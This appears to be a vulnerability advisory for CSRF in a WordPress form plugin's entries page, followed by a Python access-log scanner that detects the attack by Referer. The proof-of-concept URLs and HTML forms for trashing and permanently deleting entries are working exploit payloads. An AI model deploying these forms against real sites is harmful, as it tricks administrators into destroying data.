The plugin does not enforce nonce checks, which could allow attackers to make a logged-in admin or editor delete and restore arbitrary form entries via CSRF attacks.
Single entry trash: https://example.com/wp-admin/admin.php?page=vfb-entries&action=trash&entry=2
Single entry permanent deletion: https://example.com/wp-admin/admin.php?page=vfb-entries&action=delete&entry=3
Single entry restoration: https://example.com/wp-admin/admin.php?page=vfb-entries&action=restore&entry=3
Bulk Trash
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=vfb-entries"
method="POST">
<input type="hidden" name="s" value="" />
<input type="hidden" name="action" value="trash" />
<input type="hidden" name="m" value="0" />
<input type="hidden" name="form-filter" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="entry[]" value="5" />
<input type="hidden" name="entry[]" value="4" />
<input type="hidden" name="action2" value="trash" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Bulk permanent delete
<html>
<body>
<form action="http://example.com/wp-admin/admin.php?page=vfb-entries"
method="POST">
<input type="hidden" name="s" value="" />
<input type="hidden" name="action" value="delete" />
<input type="hidden" name="m" value="0" />
<input type="hidden" name="form-filter" value="-1" />
<input type="hidden" name="paged" value="1" />
<input type="hidden" name="entry[]" value="5" />
<input type="hidden" name="entry[]" value="4" />
<input type="hidden" name="action2" value="delete" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
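Until nonce checks are in place, the requests listed above can be spotted in web server access logs by their Referer. The following is an added detection example, not code from the plugin or the original advisory; it assumes combined log format and a site host of example.com, and the names classify and scan and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

SITE_HOST = "example.com"  # assumption: host name of the WordPress site
STATE_ACTIONS = {"trash", "delete", "restore"}  # actions named in the advisory

# Combined log format: ip ident user [time] "METHOD target PROTO" status size "referer" ...
LINE_RE = re.compile(
    r'^\S+ \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)"'
)

def classify(line):
    """Return a dict for a vfb-entries request that did not come from the site itself."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url, method, referer = urlsplit(m["target"]), m["method"], m["referer"]
    query = parse_qs(url.query)
    if not url.path.endswith("/wp-admin/admin.php") or query.get("page") != ["vfb-entries"]:
        return None
    action = (query.get("action") or [None])[0]
    # GET carries the action in the URL; bulk POSTs carry it in the body, which is not logged
    if method not in ("GET", "POST") or (method == "GET" and action not in STATE_ACTIONS):
        return None
    if referer in ("", "-"):
        reason = "no-referer"  # Referer can be suppressed by the sending page
    elif urlsplit(referer).hostname != SITE_HOST:
        reason = "cross-origin-referer"
    else:
        return None  # same-site navigation from wp-admin
    return {"method": method, "action": action or "(in POST body)",
            "entries": query.get("entry", []), "reason": reason}

def scan(lines):
    """Classify every log line and keep only the suspicious ones."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (not real traffic)
SAMPLE_LOG = [
    '198.51.100.10 - - [01/Jan/2024:10:00:00 +0000] "GET /wp-admin/admin.php?page=vfb-entries&action=delete&entry=3 HTTP/1.1" 302 0 "https://unrelated.invalid/p.html" "Mozilla/5.0"',
    '198.51.100.10 - - [01/Jan/2024:10:01:00 +0000] "GET /wp-admin/admin.php?page=vfb-entries&action=trash&entry=2 HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=vfb-entries" "Mozilla/5.0"',
    '198.51.100.10 - - [01/Jan/2024:10:02:00 +0000] "POST /wp-admin/admin.php?page=vfb-entries HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.10 - - [01/Jan/2024:10:03:00 +0000] "GET /wp-admin/admin.php?page=vfb-entries HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.10 - - [01/Jan/2024:10:04:00 +0000] "POST /wp-admin/admin.php?page=vfb-entries HTTP/1.1" 302 0 "https://example.com/wp-admin/admin.php?page=vfb-entries" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Hits with reason no-referer are lower confidence than cross-origin ones, since privacy tools and bookmarks also strip the Referer.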